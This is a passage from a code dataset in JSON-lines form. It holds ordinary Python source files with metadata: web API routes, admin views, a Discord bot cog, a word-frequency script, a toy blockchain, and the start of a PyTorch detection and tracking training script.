"line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}]}
+{"seq_id": "16029678397", "text": "from paynechain.block import BlockChain\nfrom pathlib import Path\nimport pickle\n\nbc_file = Path('blockchain')\nif bc_file.is_file():\n with open('blockchain', 'rb') as bc_handle:\n bc = pickle.load(bc_handle)\nelse:\n bc = BlockChain()\n bc.make_genesis_block()\n\ndata = input(\"Add some data to le blockchain: \")\n\nbc.make_next_block(data)\n\nwith open('blockchain', 'wb') as bc_write_handle:\n pickle.dump(bc, bc_write_handle)", "repo_name": "rollinginsanity/paynechayne", "sub_path": "run.py", "file_name": "run.py", "file_ext": "py", "file_size_in_byte": 435, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pathlib.Path", "line_number": 5, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 8, "usage_type": "call"}, {"api_name": "paynechain.block.BlockChain", "line_number": 10, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "33050462491", "text": "import os\nimport genai_core.types\nimport genai_core.upload\nimport genai_core.documents\nfrom pydantic import BaseModel\nfrom aws_lambda_powertools import Logger, Tracer\nfrom aws_lambda_powertools.event_handler.api_gateway import Router\n\ntracer = Tracer()\nrouter = Router()\nlogger = Logger()\n\n\nclass FileUploadRequest(BaseModel):\n fileName: str\n\n\nclass TextDocumentRequest(BaseModel):\n title: str\n content: str\n\n\nclass QnADocumentRequest(BaseModel):\n question: str\n answer: str\n\n\nclass WebsiteDocumentRequest(BaseModel):\n sitemap: bool\n address: str\n followLinks: bool\n limit: int\n\n\nallowed_extensions = set(\n [\n \".csv\",\n \".doc\",\n \".docx\",\n \".epub\",\n \".odt\",\n \".pdf\",\n \".ppt\",\n \".pptx\",\n \".tsv\",\n \".xlsx\",\n \".eml\",\n \".html\",\n \".json\",\n \".md\",\n \".msg\",\n \".rst\",\n \".rtf\",\n \".txt\",\n \".xml\",\n ]\n)\n\n\n@router.post(\"/workspaces//documents/file-upload\")\n@tracer.capture_method\ndef file_upload(workspace_id: str):\n data: dict = router.current_event.json_body\n request = FileUploadRequest(**data)\n\n _, extension = os.path.splitext(request.fileName)\n if extension not in allowed_extensions:\n raise genai_core.types.CommonError(\"Invalid file extension\")\n\n result = genai_core.upload.generate_presigned_post(workspace_id, request.fileName)\n\n return {\"ok\": True, \"data\": result}\n\n\n@router.get(\"/workspaces//documents/\")\n@tracer.capture_method\ndef get_documents(workspace_id: str, document_type: str):\n query_string = router.current_event.query_string_parameters or {}\n last_document_id = query_string.get(\"lastDocumentId\", None)\n\n result = genai_core.documents.list_documents(\n workspace_id, document_type, last_document_id\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"items\": [_convert_document(item) for item in result[\"items\"]],\n \"lastDocumentId\": result[\"last_document_id\"],\n },\n }\n\n\n@router.post(\"/workspaces//documents/\")\n@tracer.capture_method\ndef add_document(workspace_id: str, document_type: str):\n data: dict = router.current_event.json_body\n\n if document_type == \"text\":\n request = TextDocumentRequest(**data)\n request.title = request.title.strip()[:1000]\n result = genai_core.documents.create_document(\n workspace_id=workspace_id,\n document_type=document_type,\n title=request.title,\n content=request.content,\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"workspaceId\": result[\"workspace_id\"],\n \"documentId\": result[\"document_id\"],\n },\n }\n elif document_type == \"qna\":\n request = QnADocumentRequest(**data)\n request.question = request.question.strip()[:1000]\n request.answer = request.answer.strip()[:1000]\n result = genai_core.documents.create_document(\n workspace_id=workspace_id,\n document_type=document_type,\n title=request.question,\n content=request.question,\n content_complement=request.answer,\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"workspaceId\": result[\"workspace_id\"],\n \"documentId\": result[\"document_id\"],\n },\n }\n elif document_type == \"website\":\n request = WebsiteDocumentRequest(**data)\n request.address = request.address.strip()[:10000]\n document_sub_type = \"sitemap\" if request.sitemap else None\n request.limit = min(max(request.limit, 1), 1000)\n\n result = genai_core.documents.create_document(\n workspace_id=workspace_id,\n document_type=document_type,\n document_sub_type=document_sub_type,\n path=request.address,\n crawler_properties={\n \"follow_links\": request.followLinks,\n \"limit\": request.limit,\n },\n )\n\n return {\n \"ok\": True,\n \"data\": {\n \"workspaceId\": result[\"workspace_id\"],\n \"documentId\": result[\"document_id\"],\n },\n }\n\n\ndef _convert_document(document: dict):\n return {\n \"id\": document[\"document_id\"],\n \"type\": document[\"document_type\"],\n \"subType\": document[\"document_sub_type\"],\n \"status\": document[\"status\"],\n \"title\": document[\"title\"],\n \"path\": document[\"path\"],\n \"sizeInBytes\": document[\"size_in_bytes\"],\n \"vectors\": document[\"vectors\"],\n \"subDocuments\": document[\"sub_documents\"],\n \"errors\": document[\"errors\"],\n \"createdAt\": document[\"created_at\"],\n \"updatedAt\": document[\"updated_at\"],\n }\n", "repo_name": "donhbk/aws-genai-llm-chatbot", "sub_path": "lib/chatbot-api/functions/api-handler/routes/documents.py", "file_name": "documents.py", "file_ext": "py", "file_size_in_byte": 4868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aws_lambda_powertools.Tracer", "line_number": 9, "usage_type": "call"}, {"api_name": "aws_lambda_powertools.event_handler.api_gateway.Router", "line_number": 10, "usage_type": "call"}, {"api_name": "aws_lambda_powertools.Logger", "line_number": 11, "usage_type": "call"}, {"api_name": "pydantic.BaseModel", "line_number": 14, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 18, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 23, "usage_type": "name"}, {"api_name": "pydantic.BaseModel", "line_number": 28, "usage_type": "name"}, {"api_name": "os.path.splitext", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "genai_core.types.types.CommonError", "line_number": 68, "usage_type": "call"}, {"api_name": "genai_core.types.types", "line_number": 68, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 68, "usage_type": "name"}, {"api_name": "genai_core.types.upload.generate_presigned_post", "line_number": 70, "usage_type": "call"}, {"api_name": "genai_core.types.upload", "line_number": 70, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 70, "usage_type": "name"}, {"api_name": "genai_core.types.documents.list_documents", "line_number": 81, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 81, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 81, "usage_type": "name"}, {"api_name": "genai_core.types.documents.create_document", "line_number": 102, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 102, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 102, "usage_type": "name"}, {"api_name": "genai_core.types.documents.create_document", "line_number": 120, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 120, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 120, "usage_type": "name"}, {"api_name": "genai_core.types.documents.create_document", "line_number": 141, "usage_type": "call"}, {"api_name": "genai_core.types.documents", "line_number": 141, "usage_type": "attribute"}, {"api_name": "genai_core.types", "line_number": 141, "usage_type": "name"}]}
+{"seq_id": "71398852567", "text": "# coding=utf8\n\nimport time\nimport json\nfrom datetime import datetime\nfrom flask import current_app, flash, jsonify, request\nfrom jinja2 import Markup\nfrom flask_admin import expose\nfrom flask_admin.actions import action\n# from flask_admin.form import rules\nfrom yunduo.conf import xconf\n# from yunduo.utils import parse_rate\nfrom xadmin.view.base import BaseView\n# from xadmin.base.rules import Row, Column\nfrom xadmin.utils.format import date_format, map_format\nfrom xadmin.helpers import set_current_project\nfrom xadmin.constant import STATUS_ENABLE, STATUS_DISABLE\n# from xadmin.rabbitq import get_queues\n\n# from connections import redis_conf, redis_df\n# from xspider.app import app as celery_app\n# from xspider.tasks import crawl\n\n\nclass BlockView(BaseView):\n inject_current_project = True\n can_view_details = False\n # details_modal = True\n # details_modal_template = 'admin/model/modals/project_details.html'\n\n column_list = ['name', 'project', 'owner', 'created']\n column_filters = ['name']\n\n column_labels = {\n 'name': u'名称',\n 'alias': u'别名',\n 'type': u'类型',\n 'status': u'状态',\n 'owner': u'创建者',\n\n 'created': u'新增时间',\n 'updated': u'更新时间',\n 'published': u'发布时间'\n\n }\n\n column_searchable_list = ('name', )\n column_formatters = {\n # 'name': _project_pages_index,\n # 'status': map_format({START: u'启用', PAUSE: u'暂停', STOP: u'停用'}),\n 'created': date_format,\n 'updated': date_format,\n 'published': date_format,\n }\n\n form_subdocuments = {\n 'rules': {\n 'form_subdocuments': {\n None: {\n 'form_choices': {\n 'field': [('dlcount', '下载数'), ('rule', u'规则抽取'), ('code', u'Py代码抽取')],\n 'window': [(60, '1分钟'), (300, '5分钟'), (900, '15分钟'), (1800, '30分钟'), (3600, '60分钟')],\n\n }\n }\n }\n }\n }\n\n # form_rules = ['name', 'alias']\n\n form_widget_args = {\n\n }\n\n def enable_blocked(self, obj):\n old_blocked = xconf.get_blocked(obj.project.alias)\n\n xconf.set_blocked(obj.project.alias, obj.alias, obj.to_conf())\n obj.status = STATUS_ENABLE\n obj.published = datetime.now()\n obj.save()\n self.logger.info(u'启用屏蔽检测策略 %s', obj.alias, extra={'project': obj.project.alias, 'blocked': obj.alias})\n return obj\n\n def disable_blocked(self, obj):\n xconf.del_blocked(obj.project.alias, obj.alias)\n obj.status = STATUS_DISABLE\n obj.save()\n self.logger.info(u'停用屏蔽检测策略 %s', obj.alias, extra={'project': obj.project.alias, 'blocked': obj.alias})\n return obj\n", "repo_name": "icaicai/yunduo", "sub_path": "app/xadmin/view/block.py", "file_name": "block.py", "file_ext": "py", "file_size_in_byte": 2829, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xadmin.view.base.BaseView", "line_number": 25, "usage_type": "name"}, {"api_name": "xadmin.utils.format.date_format", "line_number": 51, "usage_type": "name"}, {"api_name": "xadmin.utils.format.date_format", "line_number": 52, "usage_type": "name"}, {"api_name": "xadmin.utils.format.date_format", "line_number": 53, "usage_type": "name"}, {"api_name": "yunduo.conf.xconf.get_blocked", "line_number": 77, "usage_type": "call"}, {"api_name": "yunduo.conf.xconf", "line_number": 77, "usage_type": "name"}, {"api_name": "yunduo.conf.xconf.set_blocked", "line_number": 79, "usage_type": "call"}, {"api_name": "yunduo.conf.xconf", "line_number": 79, "usage_type": "name"}, {"api_name": "xadmin.constant.STATUS_ENABLE", "line_number": 80, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 81, "usage_type": "name"}, {"api_name": "yunduo.conf.xconf.del_blocked", "line_number": 87, "usage_type": "call"}, {"api_name": "yunduo.conf.xconf", "line_number": 87, "usage_type": "name"}, {"api_name": "xadmin.constant.STATUS_DISABLE", "line_number": 88, "usage_type": "name"}]}
+{"seq_id": "30038569020", "text": "from django.contrib import admin\nfrom django.urls import path, include\nfrom django.contrib.auth import views\n\nfrom apps.story.views import frontpage, search, submit, newest, vote, story\nfrom apps.core.views import signup\n\nurlpatterns = [\n path('', frontpage, name='frontpage'),\n path('s//vote/', vote, name='vote'),\n path('s//', story, name='story'),\n path('u/', include('apps.userprofile.urls')),\n path('newest/', newest, name='newest'),\n path('search/', search, name='search'),\n path('submit/', submit, name='submit'),\n path('signup/', signup, name='signup'),\n path('login/', views.LoginView.as_view(template_name='core/login.html'), name='login'),\n path('logout/', views.LogoutView.as_view(), name='logout'),\n path('admin/', admin.site.urls),\n]\n", "repo_name": "SteinOveHelset/codingnews", "sub_path": "codingnews/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 809, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "apps.story.views.frontpage", "line_number": 9, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "apps.story.views.vote", "line_number": 10, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "apps.story.views.story", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "apps.story.views.newest", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "apps.story.views.search", "line_number": 14, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "apps.story.views.submit", "line_number": 15, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "apps.core.views.signup", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LoginView", "line_number": 17, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView.as_view", "line_number": 18, "usage_type": "call"}, {"api_name": "django.contrib.auth.views.LogoutView", "line_number": 18, "usage_type": "attribute"}, {"api_name": "django.contrib.auth.views", "line_number": 18, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 19, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 19, "usage_type": "name"}]}
+{"seq_id": "423855906", "text": "def read_file(file):\n if '.xml' in file:\n import xml.etree.ElementTree as ET\n tree = ET.parse(file)\n descriptions = []\n root = tree.getroot()\n xml_items = root.findall('channel/item')\n\n for item in xml_items:\n description = item.find('description')\n descriptions += description.text.split(\" \")\n return descriptions\n\n elif '.json' in file:\n import json\n import chardet\n with open(file, 'rb') as f:\n data = f.read()\n result = chardet.detect(data)\n data = data.decode(result['encoding'])\n data = json.loads(data)\n full_text = ''\n for items in data['rss']['channel']['items']:\n full_text += ' ' + items['description']\n descriptions = full_text.split(' ')\n return descriptions\n\n\ndef longer_than_x(descriptions, x):\n longer_than_list = list()\n for word in descriptions:\n if len(word) > x:\n longer_than_list.append(word)\n return longer_than_list\n\n\ndef sort_dict(longer_than_list):\n sorted_dict = {word: longer_than_list.count(word) for word in longer_than_list}\n return sorted_dict\n\n\ndef top_y_words(sorted_dict, y):\n list_of_lists = list()\n for word in sorted_dict.keys():\n list_of_lists.append([word, sorted_dict[word]])\n result = sorted(list_of_lists, key=lambda pair: pair[1], reverse=True)\n\n counter = 1\n for element in result:\n print('{}. {} - {}'.format(counter, element[0], element[1]))\n if counter == y:\n break\n counter += 1\n\n\ndef core():\n input_1 = input('Введите имя папки: ')\n input_2 = input('Введите имя файла (XML или JSON): ')\n input_3 = int(input('Минимальное число символов в словах для поиска: '))\n input_4 = int(input('Введите длину списка часто повторяющихся слов: '))\n file = str(input_1 + '/' + input_2)\n data = read_file(file)\n data_list = longer_than_x(data, input_3)\n data_dict = sort_dict(data_list)\n top_y_words(data_dict, input_4)\n\n\nif __name__ == '__main__':\n core()\n", "repo_name": "igortsallagov/py-hw-7", "sub_path": "netology-7.py", "file_name": "netology-7.py", "file_ext": "py", "file_size_in_byte": 2221, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "xml.etree.ElementTree.parse", "line_number": 4, "usage_type": "call"}, {"api_name": "xml.etree.ElementTree", "line_number": 4, "usage_type": "name"}, {"api_name": "chardet.detect", "line_number": 19, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 21, "usage_type": "call"}]}
+{"seq_id": "10288995036", "text": "from flask import Blueprint, request, render_template\n\nfrom src import db\nfrom src.errands.forms import ErrandForm\nfrom src.errands.models import Errand\nfrom src.places.models import Place, Location\nfrom src.wrappers import add_new_place, add_opening_hours\n\n'''\nA Blueprint is a way to organize a group of related views and other code. \nRather than registering views and other code directly with an application, they are registered with a blueprint.\nThen the blueprint is registered with the application when it is available in the factory function.\n'''\n\nbp = Blueprint('errand', __name__)\n\n\n@bp.route('/errands/create', methods=('GET', 'POST'))\ndef errands_create():\n form = ErrandForm(request.form)\n if request.method == 'POST':\n print(f'DEBUG form={form.data}')\n\n place_name = form.place_input.data\n place = Place.query.filter_by(name=place_name).first()\n if not place:\n place, location = add_new_place(place_name)\n open_hours = add_opening_hours(location)\n\n\n errand = Errand(form.name.data, form.duration_mins.data, place.id, form.notes.data)\n db.session.add(errand)\n db.session.commit()\n\n return render_template('errand.html', form=form)\n", "repo_name": "eugene01a/trip-optimization", "sub_path": "src/errands/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1223, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Blueprint", "line_number": 15, "usage_type": "call"}, {"api_name": "src.errands.forms.ErrandForm", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 21, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 21, "usage_type": "name"}, {"api_name": "src.places.models.Place.query.filter_by", "line_number": 25, "usage_type": "call"}, {"api_name": "src.places.models.Place.query", "line_number": 25, "usage_type": "attribute"}, {"api_name": "src.places.models.Place", "line_number": 25, "usage_type": "name"}, {"api_name": "src.wrappers.add_new_place", "line_number": 27, "usage_type": "call"}, {"api_name": "src.wrappers.add_opening_hours", "line_number": 28, "usage_type": "call"}, {"api_name": "src.errands.models.Errand", "line_number": 31, "usage_type": "call"}, {"api_name": "src.db.session.add", "line_number": 32, "usage_type": "call"}, {"api_name": "src.db.session", "line_number": 32, "usage_type": "attribute"}, {"api_name": "src.db", "line_number": 32, "usage_type": "name"}, {"api_name": "src.db.session.commit", "line_number": 33, "usage_type": "call"}, {"api_name": "src.db.session", "line_number": 33, "usage_type": "attribute"}, {"api_name": "src.db", "line_number": 33, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "35621203939", "text": "import discord\r\nfrom discord.ext import commands\r\n\r\nclass General(commands.Cog, name=\"General Commands\"):\r\n\tdef __init__(self, bot):\r\n\t\tself.bot = bot\r\n\r\n\t@commands.command(name='hello')\r\n\tasync def hello(self, ctx):\r\n\t\t\"Hello World!\"\r\n\t\tawait ctx.send('Hello World!')\r\n\r\n\t@commands.command(name='spitback')\r\n\tasync def spitback(self, ctx, arg: str):\r\n\t\t\"Responds with your text.\"\r\n\t\tawait ctx.send(arg)\r\n\r\n\t@spitback.error\r\n\tasync def spitback_error(self, ctx, error):\r\n\t\terror = getattr(error, 'original', error)\r\n\t\tif isinstance(error, commands.BadArgument):\r\n\t\t\tembed=discord.Embed(title=\"Error!\", description=\"Unknown argument type or bad argument.\", color=0xfd0000)\r\n\t\t\tembed.add_field(name=\"Proper usage:\", value=\"```{}spitback ```\".format(ctx.prefix), inline=True)\r\n\t\t\tembed.set_footer(text=\"HiggsBot - A code executing Discord bot!\")\r\n\t\tif isinstance(error, commands.MissingRequiredArgument):\r\n\t\t\tembed=discord.Embed(title=\"Error!\", description=\"Missing argument.\", color=0xfd0000)\r\n\t\t\tembed.add_field(name=\"Proper usage:\", value=\"```{}spitback ```\".format(ctx.prefix), inline=True)\r\n\t\t\tembed.set_footer(text=\"HiggsBot - A code executing Discord bot!\")\r\n\t\tawait ctx.send(embed=embed)\r\n\r\n\t@commands.command(name='readme')\r\n\tasync def readme(self,ctx):\r\n\t\t\"Print a simple readme\"\r\n\t\tf = open(\"data/general/help.txt\", \"r\")\r\n\t\tawait ctx.send(f.read())\r\n\t\tf.close()\r\n\r\ndef setup(bot):\r\n\tbot.add_cog(General(bot))", "repo_name": "higgsbot/main", "sub_path": "cogs/general.py", "file_name": "general.py", "file_ext": "py", "file_size_in_byte": 1434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "discord.ext.commands.Cog", "line_number": 4, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 4, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 8, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 8, "usage_type": "name"}, {"api_name": "discord.ext.commands.command", "line_number": 13, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 13, "usage_type": "name"}, {"api_name": "discord.ext.commands.BadArgument", "line_number": 21, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 21, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 22, "usage_type": "call"}, {"api_name": "discord.ext.commands.MissingRequiredArgument", "line_number": 25, "usage_type": "attribute"}, {"api_name": "discord.ext.commands", "line_number": 25, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 26, "usage_type": "call"}, {"api_name": "discord.ext.commands.command", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 31, "usage_type": "name"}]}
+{"seq_id": "11877015022", "text": "import os\nimport pathlib\nimport pickle\nimport shutil\nimport time\nfrom functools import partial\nimport json \nimport fire\nimport numpy as np\nimport torch\nfrom google.protobuf import text_format\nfrom tensorboardX import SummaryWriter\nimport torchvision\nimport torchplus\nimport second.data.kitti_common as kitti\nfrom second.builder import target_assigner_builder, voxel_builder\nfrom second.data.preprocess_tr import merge_second_batch_tr\nfrom second.data.preprocess import merge_second_batch\nfrom second.data.preprocess_tr_vid import merge_second_batch_tr_vid\nfrom second.data.preprocess_tr_vid_spatio import merge_second_batch_tr_vid_spatio\nfrom second.protos import pipeline_pb2\nfrom second.pytorch.builder import (box_coder_builder, input_reader_builder_tr, input_reader_builder_tr_vid, input_reader_builder_tr_vid_spatio,\n lr_scheduler_builder, optimizer_builder,\n second_builder,\n second_2stage_builder,\n second_endtoend_builder,\n second_endtoend_builder_tr,\n second_endtoend_builder_tr_share,\n second_endtoend_builder_tr_share_freeze,\n second_endtoend_builder_tr_share_freeze_mmmot,\n second_endtoend_builder_tr_share_freeze_mmmot_ori,\n second_endtoend_builder_spatio)\nfrom second.utils.eval import get_coco_eval_result, get_official_eval_result\nfrom second.utils.progress_bar import ProgressBar\nfrom collections import OrderedDict\n# import torch.distributed as dist\n# from apex.parallel import DistributedDataParallel as DDP\n\nimport sys\nsys.path.append('./mmMOT')\nimport argparse\nimport logging\nimport os\nimport pprint\nimport time\n\nimport torch\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport yaml\nfrom easydict import EasyDict\nfrom kitti_devkit.evaluate_tracking import evaluate as evaluate_tr\nfrom tensorboardX import SummaryWriter\nfrom torch.utils.data import DataLoader\n# from models import model_entry\n# from tracking_model import TrackingModule\nfrom tracking_model_vid import TrackingModule\nfrom utils_tr.build_util import (build_augmentation, build_criterion, \n build_dataset, build_lr_scheduler, build_model,\n build_optim)\nfrom utils_tr.data_util import write_kitti_result\nfrom utils_tr.train_util import (AverageMeter, DistributedGivenIterationSampler,\n create_logger, load_state, save_checkpoint)\n\n\ndef validate(val_loader,\n net,\n step,\n config,\n result_path,\n part='train',\n fusion_list=None,\n fuse_prob=False):\n\n logger = logging.getLogger('global_logger')\n for i, (sequence) in enumerate(val_loader):\n logger.info('Test: [{}/{}]\\tSequence ID: KITTI-{}'.format(\n i, len(val_loader), sequence.name))\n seq_loader = DataLoader(\n sequence,\n batch_size=config.batch_size,\n shuffle=False,\n num_workers=config.workers,\n pin_memory=True)\n if len(seq_loader) == 0:\n net.eval_tr()\n logger.info('Empty Sequence ID: KITTI-{}, skip'.format(\n sequence.name))\n else:\n validate_seq(seq_loader, net, config)\n\n write_kitti_result(\n result_path,\n sequence.name,\n step,\n net.frames_id,\n net.frames_det,\n part=part)\n\n MOTA, MOTP, recall, prec, F1, fp, fn, id_switches = evaluate_tr(\n step, result_path, part=part)\n\n # net.train()\n return MOTA, MOTP, recall, prec, F1, fp, fn, id_switches\n\n\ndef validate_seq(val_loader,\n net,\n config,\n fusion_list=None,\n fuse_prob=False):\n batch_time = AverageMeter(0)\n\n # switch to evaluate mode\n net.eval_tr()\n\n logger = logging.getLogger('global_logger')\n end = time.time()\n\n with torch.no_grad():\n for i, (input, det_info, dets, det_split) in enumerate(val_loader):\n input = input.cuda()\n if len(det_info) > 0:\n for k, v in det_info.items():\n det_info[k] = det_info[k].cuda() if not isinstance(\n det_info[k], list) else det_info[k]\n\n # compute output\n aligned_ids, aligned_dets, frame_start = net.predict(\n input[0], det_info, dets, det_split)\n\n batch_time.update(time.time() - end)\n end = time.time()\n if i % config.print_freq == 0:\n logger.info(\n 'Test Frame: [{0}/{1}]\\tTime '\n '{batch_time.val:.3f} ({batch_time.avg:.3f})'.format(\n i, len(val_loader), batch_time=batch_time))\n\n\ndef _get_pos_neg_loss(cls_loss, labels):\n # cls_loss: [N, num_anchors, num_class]\n # labels: [N, num_anchors]\n batch_size = cls_loss.shape[0]\n if cls_loss.shape[-1] == 1 or len(cls_loss.shape) == 2:\n cls_pos_loss = (labels > 0).type_as(cls_loss) * cls_loss.view(\n batch_size, -1)\n cls_neg_loss = (labels == 0).type_as(cls_loss) * cls_loss.view(\n batch_size, -1)\n cls_pos_loss = cls_pos_loss.sum() / batch_size\n cls_neg_loss = cls_neg_loss.sum() / batch_size\n else:\n cls_pos_loss = cls_loss[..., 1:].sum() / batch_size\n cls_neg_loss = cls_loss[..., 0].sum() / batch_size\n return cls_pos_loss, cls_neg_loss\n\n\ndef _flat_nested_json_dict(json_dict, flatted, sep=\".\", start=\"\"):\n for k, v in json_dict.items():\n if isinstance(v, dict):\n _flat_nested_json_dict(v, flatted, sep, start + sep + k)\n else:\n flatted[start + sep + k] = v\n\n\ndef flat_nested_json_dict(json_dict, sep=\".\") -> dict:\n \"\"\"flat a nested json-like dict. this function make shadow copy.\n \"\"\"\n flatted = {}\n for k, v in json_dict.items():\n if isinstance(v, dict):\n _flat_nested_json_dict(v, flatted, sep, k)\n else:\n flatted[k] = v\n return flatted\n\n\ndef example_convert_to_torch(example, dtype=torch.float32,\n device=None) -> dict:\n device = device or torch.device(\"cuda:0\")\n example_torch = {}\n float_names = [\n \"voxels\", \"anchors\", \"reg_targets\", \"reg_weights\", \"bev_map\", \"rect\",\n \"Trv2c\", \"P2\", \"f_view\",\"idxs_norm\", \"p_voxels\", \"p_f_view\", \"p_idxs_norm\", 'box_id', 'p_box_id', 'gt_boxes', 'p_gt_boxes', 'boxes_2d', 'p_boxes_2d'\n ]\n\n for k, v in example.items():\n if k in float_names:\n example_torch[k] = torch.tensor(v, dtype=torch.float32, device=device).to(dtype)\n elif k in [\"coordinates\", \"labels\", \"num_points\", \"p_coordinates\", \"p_num_points\"]:\n example_torch[k] = torch.tensor(\n v, dtype=torch.int32, device=device)\n elif k in [\"anchors_mask\"]:\n example_torch[k] = torch.tensor(\n v, dtype=torch.uint8, device=device)\n else:\n example_torch[k] = v\n return example_torch\n\n\ndef train(config_path,\n model_dir,\n use_fusion=True,\n use_ft=False,\n use_second_stage=True,\n use_endtoend=True,\n result_path=None,\n create_folder=False,\n display_step=50,\n summary_step=5,\n local_rank=0,\n pickle_result=True,\n patchs=None):\n \"\"\"train a VoxelNet mod[el specified by a config file.\n \"\"\"\n ############ tracking\n config_tr_path = '/mnt/new_iou/second.pytorch/second/mmMOT/experiments/second/spatio_test/config.yaml'\n load_tr_path = '/mnt/new_iou/second.pytorch/second/mmMOT/experiments/second/spatio_test/results'\n with open(config_tr_path) as f:\n config_tr = yaml.load(f, Loader=yaml.FullLoader)\n\n result_path_tr = load_tr_path\n config_tr = EasyDict(config_tr['common'])\n config_tr.save_path = os.path.dirname(config_tr_path)\n\n # create model\n # model_tr = build_model(config_tr)\n # model_tr.cuda()\n\n # optimizer_tr = 